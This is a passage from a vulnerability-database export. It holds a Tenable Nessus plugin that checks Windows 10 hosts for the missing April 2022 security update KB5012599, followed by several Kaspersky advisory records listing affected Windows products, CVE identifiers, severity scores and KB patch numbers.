\"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24488\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26791\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012599\");\n script_xref(name:\"MSFT\", value:\"MS22-5012599\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012599: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802,\n CVE-2022-26803, CVE-2022-26801, CVE-2022-26796,\n CVE-2022-26787, CVE-2022-26797, CVE-2022-26827,\n CVE-2022-26810, CVE-2022-26808, CVE-2022-26798,\n CVE-2022-24549, CVE-2022-26795, CVE-2022-26791, \n CVE-2022-26794, CVE-2022-26904, CVE-2022-26792,\n CVE-2022-26807, CVE-2022-26788, CVE-2022-26828, \n CVE-2022-26790, CVE-2022-26914, CVE-2022-26793, \n CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, \n CVE-2022-24489, CVE-2022-24488, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, \n CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, \n CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26917, \n CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, \n CVE-2022-26919, CVE-2022-26823, CVE-2022-26809, \n CVE-2022-26824, CVE-2022-26818, CVE-2022-26815, \n CVE-2022-26814, CVE-2022-26822, CVE-2022-26918, \n CVE-2022-26829, CVE-2022-26820, CVE-2022-26826, \n CVE-2022-26819, CVE-2022-26825, CVE-2022-26817, \n CVE-2022-26821, CVE-2022-26813, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, \n CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-26920, \n CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, \n CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, \n CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012599\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012599'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:19042,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012599])\n|| smb_check_rollup(os:'10',\n sp:0,\n os_build:19043,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012599])\n|| smb_check_rollup(os:'10',\n sp:0,\n os_build:19044,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012599])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-05-27T14:58:15", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005090](<http://support.microsoft.com/kb/5005090>) \n[5005089](<http://support.microsoft.com/kb/5005089>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005095](<http://support.microsoft.com/kb/5005095>) \n[5005088](<http://support.microsoft.com/kb/5005088>) \n[5011525](<http://support.microsoft.com/kb/5011525>) \n[5011534](<http://support.microsoft.com/kb/5011534>) \n[5011552](<http://support.microsoft.com/kb/5011552>) \n[5011529](<http://support.microsoft.com/kb/5011529>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12250 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-03-09T00:00:00", "id": "KLA12250", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12250/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:57:59", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36948](<https://nvd.nist.gov/vuln/detail/CVE-2021-36948>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-26433](<https://nvd.nist.gov/vuln/detail/CVE-2021-26433>) \n[CVE-2021-36945](<https://nvd.nist.gov/vuln/detail/CVE-2021-36945>) \n[CVE-2021-26432](<https://nvd.nist.gov/vuln/detail/CVE-2021-26432>) \n[CVE-2021-36926](<https://nvd.nist.gov/vuln/detail/CVE-2021-36926>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34487](<https://nvd.nist.gov/vuln/detail/CVE-2021-34487>) \n[CVE-2021-34530](<https://nvd.nist.gov/vuln/detail/CVE-2021-34530>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n[CVE-2021-34534](<https://nvd.nist.gov/vuln/detail/CVE-2021-34534>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34486](<https://nvd.nist.gov/vuln/detail/CVE-2021-34486>) \n[CVE-2021-36932](<https://nvd.nist.gov/vuln/detail/CVE-2021-36932>) \n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-26431](<https://nvd.nist.gov/vuln/detail/CVE-2021-26431>) \n[CVE-2021-26426](<https://nvd.nist.gov/vuln/detail/CVE-2021-26426>) \n[CVE-2021-34536](<https://nvd.nist.gov/vuln/detail/CVE-2021-34536>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36933](<https://nvd.nist.gov/vuln/detail/CVE-2021-36933>) \n[CVE-2021-36938](<https://nvd.nist.gov/vuln/detail/CVE-2021-36938>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4023814](<http://support.microsoft.com/kb/4023814>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005031](<http://support.microsoft.com/kb/5005031>) \n[5005033](<http://support.microsoft.com/kb/5005033>) \n[5005030](<http://support.microsoft.com/kb/5005030>) \n[5005106](<http://support.microsoft.com/kb/5005106>) \n[5005040](<http://support.microsoft.com/kb/5005040>) \n[5005099](<http://support.microsoft.com/kb/5005099>) \n[5005043](<http://support.microsoft.com/kb/5005043>) \n[5005076](<http://support.microsoft.com/kb/5005076>) \n[5005094](<http://support.microsoft.com/kb/5005094>) \n[5011535](<http://support.microsoft.com/kb/5011535>) \n[5011564](<http://support.microsoft.com/kb/5011564>) \n[5011560](<http://support.microsoft.com/kb/5011560>) \n[5011527](<http://support.microsoft.com/kb/5011527>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12259 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36945", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-10-18T00:00:00", "id": "KLA12259", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12259/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:52:36", "description": "### *Detect date*:\n01/11/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, obtain sensitive information, gain privileges, cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-21924](<https://nvd.nist.gov/vuln/detail/CVE-2022-21924>) \n[CVE-2022-21905](<https://nvd.nist.gov/vuln/detail/CVE-2022-21905>) \n[CVE-2022-21925](<https://nvd.nist.gov/vuln/detail/CVE-2022-21925>) \n[CVE-2022-21836](<https://nvd.nist.gov/vuln/detail/CVE-2022-21836>) \n[CVE-2022-21880](<https://nvd.nist.gov/vuln/detail/CVE-2022-21880>) \n[CVE-2022-21900](<https://nvd.nist.gov/vuln/detail/CVE-2022-21900>) \n[CVE-2022-21859](<https://nvd.nist.gov/vuln/detail/CVE-2022-21859>) \n[CVE-2022-21883](<https://nvd.nist.gov/vuln/detail/CVE-2022-21883>) \n[CVE-2022-21833](<https://nvd.nist.gov/vuln/detail/CVE-2022-21833>) \n[CVE-2022-21915](<https://nvd.nist.gov/vuln/detail/CVE-2022-21915>) \n[CVE-2022-21890](<https://nvd.nist.gov/vuln/detail/CVE-2022-21890>) \n[CVE-2022-21908](<https://nvd.nist.gov/vuln/detail/CVE-2022-21908>) \n[CVE-2022-21893](<https://nvd.nist.gov/vuln/detail/CVE-2022-21893>) \n[CVE-2022-21834](<https://nvd.nist.gov/vuln/detail/CVE-2022-21834>) \n[CVE-2022-21904](<https://nvd.nist.gov/vuln/detail/CVE-2022-21904>) \n[CVE-2022-21922](<https://nvd.nist.gov/vuln/detail/CVE-2022-21922>) \n[CVE-2022-21838](<https://nvd.nist.gov/vuln/detail/CVE-2022-21838>) \n[CVE-2022-21848](<https://nvd.nist.gov/vuln/detail/CVE-2022-21848>) \n[CVE-2022-21884](<https://nvd.nist.gov/vuln/detail/CVE-2022-21884>) \n[CVE-2022-21897](<https://nvd.nist.gov/vuln/detail/CVE-2022-21897>) \n[CVE-2022-21850](<https://nvd.nist.gov/vuln/detail/CVE-2022-21850>) \n[CVE-2022-21857](<https://nvd.nist.gov/vuln/detail/CVE-2022-21857>) \n[CVE-2022-21862](<https://nvd.nist.gov/vuln/detail/CVE-2022-21862>) \n[CVE-2022-21913](<https://nvd.nist.gov/vuln/detail/CVE-2022-21913>) \n[CVE-2022-21835](<https://nvd.nist.gov/vuln/detail/CVE-2022-21835>) \n[CVE-2022-21903](<https://nvd.nist.gov/vuln/detail/CVE-2022-21903>) \n[CVE-2022-21889](<https://nvd.nist.gov/vuln/detail/CVE-2022-21889>) \n[CVE-2022-21919](<https://nvd.nist.gov/vuln/detail/CVE-2022-21919>) \n[CVE-2022-21899](<https://nvd.nist.gov/vuln/detail/CVE-2022-21899>) \n[CVE-2022-21914](<https://nvd.nist.gov/vuln/detail/CVE-2022-21914>) \n[CVE-2022-21885](<https://nvd.nist.gov/vuln/detail/CVE-2022-21885>) \n[CVE-2022-21851](<https://nvd.nist.gov/vuln/detail/CVE-2022-21851>) \n[CVE-2022-21843](<https://nvd.nist.gov/vuln/detail/CVE-2022-21843>) \n[CVE-2022-21920](<https://nvd.nist.gov/vuln/detail/CVE-2022-21920>) \n[CVE-2022-21916](<https://nvd.nist.gov/vuln/detail/CVE-2022-21916>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-21925](<https://vulners.com/cve/CVE-2022-21925>)5.0Critical \n[CVE-2022-21859](<https://vulners.com/cve/CVE-2022-21859>)6.9High \n[CVE-2022-21915](<https://vulners.com/cve/CVE-2022-21915>)5.0Critical \n[CVE-2022-21908](<https://vulners.com/cve/CVE-2022-21908>)5.0Critical \n[CVE-2022-21834](<https://vulners.com/cve/CVE-2022-21834>)7.2High \n[CVE-2022-21922](<https://vulners.com/cve/CVE-2022-21922>)5.0Critical \n[CVE-2022-21838](<https://vulners.com/cve/CVE-2022-21838>)7.2High \n[CVE-2022-21850](<https://vulners.com/cve/CVE-2022-21850>)9.3Critical \n[CVE-2022-21913](<https://vulners.com/cve/CVE-2022-21913>)5.0Critical \n[CVE-2022-21835](<https://vulners.com/cve/CVE-2022-21835>)7.2High 